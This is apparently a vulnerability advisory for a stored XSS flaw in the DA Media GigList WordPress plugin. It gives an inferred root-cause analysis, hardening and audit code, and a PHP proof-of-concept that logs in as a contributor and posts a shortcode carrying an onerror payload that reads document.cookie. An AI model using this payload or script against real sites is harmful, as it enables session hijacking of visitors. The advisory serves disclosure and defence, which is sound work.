Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1805: DA Media GigList <= 1.9.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'list_title' Shortcode Attribute (damedia-giglist)

CVE ID: CVE-2026-1805
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 1.9.0
Patched Version:
Disclosed: March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1805 (metadata-based):
The vulnerability is a stored cross-site scripting (XSS) flaw in the DA Media GigList WordPress plugin. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description states insufficient input sanitization and output escaping on user-supplied attributes for the `damedia_giglist` shortcode. The attack vector targets the `list_title` shortcode attribute. Authenticated attackers with contributor-level access or higher can inject malicious scripts into pages using the shortcode. The scripts execute when users view the compromised page.

Atomic Edge research infers the root cause from the CWE classification. The plugin likely registers a shortcode handler function for `damedia_giglist`. This function receives user-controlled attributes, including `list_title`. The handler fails to sanitize the `list_title` attribute value before storing it in the database. The plugin also fails to escape the attribute value when outputting it in the frontend HTML. This creates a classic stored XSS condition.

The exploitation method involves an authenticated user creating or editing a post or page. The attacker inserts the `[damedia_giglist]` shortcode with a malicious `list_title` attribute containing JavaScript. WordPress stores this content. When any visitor loads the page, WordPress executes the shortcode handler. The handler outputs the unsanitized `list_title` value without escaping, causing script execution in the victim’s browser.

A fix requires two code changes. First, the shortcode handler must sanitize the `list_title` attribute on input using `sanitize_text_field()` or a similar WordPress sanitization function. Second, the handler must escape the attribute on output using `esc_attr()` when echoing the value in HTML attributes, or `wp_kses_post()` if outputting within HTML content.
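
The two changes described above, shown on a hypothetical handler. This is an added example, not the plugin's code (the page carries no source diff); the `example_giglist_*` function names, the `example_giglist` tag and the `<h3>` markup are assumptions, and the file must be loaded inside WordPress.

```php
<?php
// Added example. Handler names, tag name and markup are hypothetical; the
// plugin's real source is not shown on this page. Requires WordPress.

// Vulnerable pattern: the attribute is concatenated into markup as-is.
// Shown for comparison only and deliberately not registered.
function example_giglist_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'list_title' => '' ), $atts, 'example_giglist' );
    return '<h3 class="giglist-title">' . $atts['list_title'] . '</h3>';
}

// Hardened pattern: sanitize on input, then escape for each output context.
function example_giglist_hardened( $atts ) {
    $atts = shortcode_atts( array( 'list_title' => '' ), $atts, 'example_giglist' );

    // Strips tags, line breaks and extra whitespace from the attribute value.
    $title = sanitize_text_field( $atts['list_title'] );

    // esc_attr() for the attribute context, esc_html() for the text node.
    // A title is plain text, so esc_html() is used here; wp_kses_post() is
    // the alternative the text names when limited markup must be allowed.
    return sprintf(
        '<h3 class="giglist-title" data-title="%s">%s</h3>',
        esc_attr( $title ),
        esc_html( $title )
    );
}

// Registered under a separate tag so it cannot clash with the plugin's own.
add_shortcode( 'example_giglist', 'example_giglist_hardened' );
```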

Exploitation impact includes session hijacking, administrative actions performed by victims, defacement, and malware distribution. The CVSS vector indicates network attack vector, low attack complexity, low privileges required, no user interaction, and scope change with low confidentiality and integrity impact. The scope change (S:C) suggests the vulnerability may affect other site components beyond the plugin’s own security context.
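
Because the shortcode text stays in stored post content, a site that ran an affected version can review existing posts for `list_title` values that are not plain text. This is an added example, not Atomic Edge or plugin code; it assumes WP-CLI is available to run it with `wp eval-file`, and the function name `example_suspicious_list_titles` and the file name are hypothetical.

```php
<?php
// Added example. Run with: wp eval-file audit-giglist.php (file name assumed).
// Lists posts whose [damedia_giglist] shortcode carries a list_title that is
// not plain text, so an administrator can review them by hand.

function example_suspicious_list_titles( $content ) {
    $hits    = array();
    $pattern = '/' . get_shortcode_regex( array( 'damedia_giglist' ) ) . '/s';
    if ( ! preg_match_all( $pattern, $content, $matches, PREG_SET_ORDER ) ) {
        return $hits;
    }
    foreach ( $matches as $m ) {
        // $m[3] is the raw attribute string of one shortcode occurrence.
        $atts = shortcode_parse_atts( $m[3] );
        if ( ! is_array( $atts ) || ! isset( $atts['list_title'] ) ) {
            continue;
        }
        $value = $atts['list_title'];
        // A plain-text title survives sanitize_text_field() unchanged and
        // contains no angle brackets or double quotes.
        if ( sanitize_text_field( $value ) !== $value || preg_match( '/[<>"]/', $value ) ) {
            $hits[] = $value;
        }
    }
    return $hits;
}

// Drafts and pending posts are included: contributors cannot publish.
// Revisions and trashed posts are not covered by this query.
$posts = get_posts( array(
    'post_type'      => 'any',
    'post_status'    => 'any',
    's'              => '[damedia_giglist',
    'posts_per_page' => -1,
) );

foreach ( $posts as $post ) {
    foreach ( example_suspicious_list_titles( $post->post_content ) as $value ) {
        // esc_html() keeps the reported value inert wherever the log is viewed.
        printf( "post %d (%s, author %d): %s\n",
            $post->ID, $post->post_status, $post->post_author, esc_html( $value ) );
    }
}
```

The check errs toward false positives (for example a title with doubled spaces), so treat its output as a review list rather than a verdict.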

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1805 - DA Media GigList <= 1.9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'list_title' Shortcode Attribute
/**
 * Proof of Concept for CVE-2026-1805
 * Assumptions:
 * 1. The target WordPress site has DA Media GigList plugin <= 1.9.0 installed.
 * 2. Valid contributor-level credentials are available.
 * 3. The plugin's shortcode handler does not sanitize/escape the 'list_title' attribute.
 * 4. The attacker can create/edit posts/pages with shortcodes.
 */

$target_url = 'https://example.com/wp-admin/post-new.php';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload: XSS via list_title attribute in damedia_giglist shortcode.
// The value is an img tag whose onerror handler shows an alert, for demonstration.
$shortcode_payload = '[damedia_giglist list_title="<img src=x onerror=alert(document.cookie)>"]';

// Initialize cURL session for WordPress login
$ch = curl_init();

// First, get the login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, 'https://example.com/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$login_page = curl_exec($ch);

// Extract login nonce (WordPress uses 'log' and 'pwd' fields, nonce in 'wp_nonce')
// This is a simplified example; real implementation needs DOM parsing.

// Perform login
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'https://example.com/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, 'https://example.com/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Check if login succeeded (simplified)
if (strpos($login_response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Now create a new post with the malicious shortcode
$post_data = [
    'post_title' => 'Test Post with XSS',
    'content' => $shortcode_payload,
    'post_status' => 'draft',
    'action' => 'editpost',
    '_wpnonce' => '', // Would need to extract actual nonce
    'post_type' => 'post'
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$post_response = curl_exec($ch);

// Verify the shortcode was inserted
if (strpos($post_response, $shortcode_payload) !== false) {
    echo "Exploit successful. Post created with malicious shortcode.\n";
    echo "Visit the post to trigger XSS payload.\n";
} else {
    echo "Post creation may have failed.\n";
}

curl_close($ch);
?>
